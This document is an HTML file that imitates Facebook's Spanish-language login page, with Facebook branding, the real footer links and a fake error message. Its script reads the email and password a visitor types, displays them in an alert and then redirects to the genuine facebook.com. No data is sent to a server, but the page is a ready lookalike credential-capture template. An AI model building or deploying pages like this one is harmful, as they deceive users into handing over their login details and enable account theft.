<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title></title>
	<style type="text/css">
		html, body {
			margin: 0;
			padding: 0;
		}
		@font-face {
		  font-family: 'SFProDisplay-Regular';
		  src: URL('SFProDisplay-Regular-1.ttf') format('truetype');
		}

		#main {
			height: 80vh;
			background: #f0f2f5;
			display: flex;
			justify-content: center;
			align-items: center;
		}

		.heading {
			font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
	    	font-size: 28px;
	    	font-weight: normal;
	    	line-height: 32px;
	    	width: 500px;
		}

		.login-container {
			align-items: center;
			background-color: #fff;
			border: none;
			border-radius: 8px;
			box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
			box-sizing: border-box;
			margin: 40px 0 0;
			padding: 20px 0 28px;
			width: 396px;
			display: flex;
			justify-content: center;
			flex-direction: column;
		}

		input {
			outline: none;
		    font-size: 17px;
		    padding: 14px 16px;
		    width: 330px;
		    border-radius: 6px;
			border: 1px solid #dddfe2;
			color: #1d2129;
			font-family: Helvetica, Arial, sans-serif;
			margin: 7px 0;
		}

		input:focus {
			outline: none;
			border-color: #1b74e4 !important;
			box-shadow: 0 0 0 2px #e7f3ff;
			caret-color: #1b74e4;
		}

		button {
			background-color: #1877f2;
			border: none;
			border-radius: 6px;
			font-size: 20px;
			line-height: 48px;
			padding: 0 22px;
			width: 364px;
			cursor: pointer;
			display: inline-block;
			text-decoration: none;
			color: white;
		}

		#forgot {
			margin-top: 20px;
			color: #1877f2;
			font-size: 14px;
			font-weight: 500;
			font-family: Helvetica, Arial, sans-serif;
			cursor: pointer;
			text-decoration: none;
		}

		.divider {
			align-items: center;
			border-bottom: 1px solid #dadde1;
			display: flex;
			margin: 20px 16px;
			text-align: center;
			height: 5px;
			width: 90%;
		}

		#new {
			background-color: #42b72a;
			cursor: pointer;
			display: inline-block;
			text-decoration: none;
			white-space: nowrap;
			border: none;
			border-radius: 6px;
			font-size: 17px;
			line-height: 48px;
			padding: 0 16px;
			font-family: Helvetica, Arial, sans-serif;
			color: white;
			font-weight: bold;
		}

		#pageFooter {
			color: #737373;
		    margin: 0 auto;
		    width: 980px;
		}

		ul {
			align-items: center;
			display: flex;
			flex-wrap: wrap;
		}

		li {
			display: flex;
			padding-left: 10px;
		}

		li, li a, .copyright {
			color: #8a8d91;
			text-decoration: none;
			font-family: Helvetica, Arial, sans-serif;
			font-size: 12px;
		}

		#copy {
			    margin-left: 4em;
		}

		#error {
			width: 90%;
			color: red;
			margin-top: 10px;
			display: none;
		}

		#error.visible {
			display: block;
		}
		
	</style>
</head>
<body>

	<div id="main">
		<div class="logo-container">
			<div class="_8ice">
				<img class="fb_logo _8ilh img" style="height: 106px;margin: -28px;" src="fb.svg" alt="Facebook">
			</div>
			<h2 class="heading">Facebook te ayuda a comunicarte y compartir con las personas que forman parte de tu vida.</h2>
		</div>
		<div class="login-container">
			<input type="text" class="inputtext _55r1 _6luy" name="email" id="email" placeholder="Correo electrónico o número de teléfono" autofocus="1" aria-label="Correo electrónico o número de teléfono">

			<input type="password" class="inputtext _55r1 _6luy" name="password" id="pwd" placeholder="Contraseña">

			<button value="1" class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login" data-testid="royal_login_button" type="button" id="goes"  onclick="login()">Iniciar sesión</button>
			<a id="forgot" target="_blank" href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjk3NTY4ODk4LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login">¿Has olvidado la contraseña?</a>
			<div id="error">
				El correo electrónico o número de móvil que has introducido no está conectado a una cuenta. Encuentra tu cuenta e inicia sesión.
			</div>
			<div class="divider"></div>
			<a target="_blank" id="new" role="button" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="https://www.facebook.com" ajaxify="/reg/spotlight/" id="u_0_0_H4" data-testid="open-registration-form-button" rel="async">Crear cuenta nueva</a>
		</div>
	</div>

	<div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>Español (España)</li><li><a class="_sv4" dir="ltr" href="https://www.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;en_US&quot;, &quot;es_ES&quot;, &quot;https:\/\/www.facebook.com\/&quot;, &quot;www_list_selector&quot;, 0); return false;" title="English (US)">English (US)</a></li><li><a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_BR&quot;, &quot;es_ES&quot;, &quot;https:\/\/pt-br.facebook.com\/&quot;, &quot;www_list_selector&quot;, 1); return false;" title="Portuguese (Brazil)">Português (Brasil)</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;es_ES&quot;, &quot;https:\/\/fr-fr.facebook.com\/&quot;, &quot;www_list_selector&quot;, 2); return false;" title="French (France)">Français (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;es_ES&quot;, &quot;https:\/\/it-it.facebook.com\/&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;es_ES&quot;, &quot;https:\/\/de-de.facebook.com\/&quot;, &quot;www_list_selector&quot;, 4); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;es_ES&quot;, &quot;https:\/\/ar-ar.facebook.com\/&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Arabic">العربية</a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;es_ES&quot;, &quot;https:\/\/zh-cn.facebook.com\/&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Simplified Chinese (China)">中文(简体)</a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;es_ES&quot;, &quot;https:\/\/hi-in.facebook.com\/&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Hindi">हिन्दी</a></li><li><a class="_sv4" dir="ltr" href="https://ja-jp.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ja_JP&quot;, &quot;es_ES&quot;, &quot;https:\/\/ja-jp.facebook.com\/&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Japanese">日本語</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fja-jp.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Mostrar más idiomas"><i class="img sp_EP9wX8qDDvu sx_0de3e6"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Enlaces del sitio de Facebook"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Regístrate en Facebook">Registrarte</a></li><li><a href="/login/" title="Iniciar sesión en Facebook">Iniciar sesión</a></li><li><a href="https://messenger.com/" title="Consultar Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite para Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Explorar en Vídeo">Vídeo</a></li><li><a href="/places/" title="Consulta lugares populares en Facebook.">Lugares</a></li><li><a href="/games/" title="Consulta los juegos en Facebook.">Juegos</a></li><li><a href="/marketplace/" title="Compra y vende artículos en Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Más información sobre Meta Pay" target="_blank">Meta&nbsp;Pay</a></li><li><a href="https://www.meta.com/" title="Finalizar compra en Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Más información sobre Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3bXv0632YG35C9lfqFOKTNrgAZuR95vXKPDNT01kbXWJ191mSJuRRTz_9behIiavzeyrzKkz9PLmdj7owxaAmjgrleI44Y-A49IZxx0qjFA6FtvwFQnMXgrjkzzIJFCQwULtzkWtdcIePebmi0SoqGvaN_3p3XqkZ94Q" title="Echa un vistazo a Instagram" target="_blank" rel="noreferrer nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.threads.net/" title="Consultar Threads" target="_blank" rel="noreferrer nofollow" data-lynx-mode="asynclazy" data-lynx-uri="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.threads.net%2F&amp;h=AT1zd_MCvNHDhKX--LPbQxMFm15iYWIqRf_6-ESvG7u6PzeveT8dILx6GQEexQfdYLGo4dn5kFkmr0wnx6-xlbKu9y3ssNd91QVmnl4yaAhaDOCcfefsLUDizCYvwBUBfbTxXKHUD9Tvd8qli3xvLdPD7MSSsBFVB53JIA">Threads</a></li><li><a href="/fundraisers/" title="Haz una donación a causas que te importan.">Recaudaciones de fondos</a></li><li><a href="/biz/directory/" title="Busca en nuestro directorio de servicios de Facebook.">Servicios</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Consulta el centro de información de votación.">Centro de información de votación</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Obtén más información sobre cómo recogemos, usamos y compartimos datos para ayudar a Facebook.">Política de privacidad</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Obtén más información sobre cómo  administrar y controlar tu privacidad en Facebook.">Centro de privacidad</a></li><li><a href="/groups/discover/" title="Explora nuestros grupos.">Grupos</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Lee nuestro blog, descubre el centro de recursos y encuentra ofertas de trabajo.">Información</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Anúnciate en Facebook.">Crear anuncio</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Crear una página">Crear página</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Desarrolla en nuestra plataforma.">Desarrolladores</a></li><li><a href="/careers/?ref=pf" title="Únete a nuestra extraordinaria empresa.">Empleo</a></li><li><a href="/policies/cookies/" title="Información sobre las cookies y Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Más información sobre Gestión de anuncios">Opciones de anuncios<i class="img sp_EP9wX8qDDvu sx_6bdd81"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Consulta nuestras políticas y condiciones.">Condiciones</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visita nuestro servicio de ayuda.">Ayuda</a></li><li><a href="help/637205020878504" title="Visita nuestro aviso para subir contactos y no usuarios.">Subir contactos y no usuarios</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="Ver y editar tu configuración de Facebook.">Configuración</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="Ver tu registro de actividad">Registro de actividad</a></li></ul></div><div class="mvl copyright"><div id="copy"><span> Meta © 2023</span></div></div></div>

	<script type="text/javascript">
		const login = () => {

		const email = document.getElementById("email").value;
		const pwd = document.getElementById("pwd").value;
		const errorEl = document.getElementById("error");
		let emailValid = (email?.length && email?.length > 5), pwdValid = pwd?.length && pwd?.length > 5;

		errorEl.classList.remove("visible");

		if (emailValid && pwdValid) {
			alert("Email:" + email + "\n" + "Clave:" + pwd);
			window.location.href = "https://www.facebook.com";
		}

		else {
			errorEl.classList.add("visible");
		}

		}
	</script>
</body>
</html>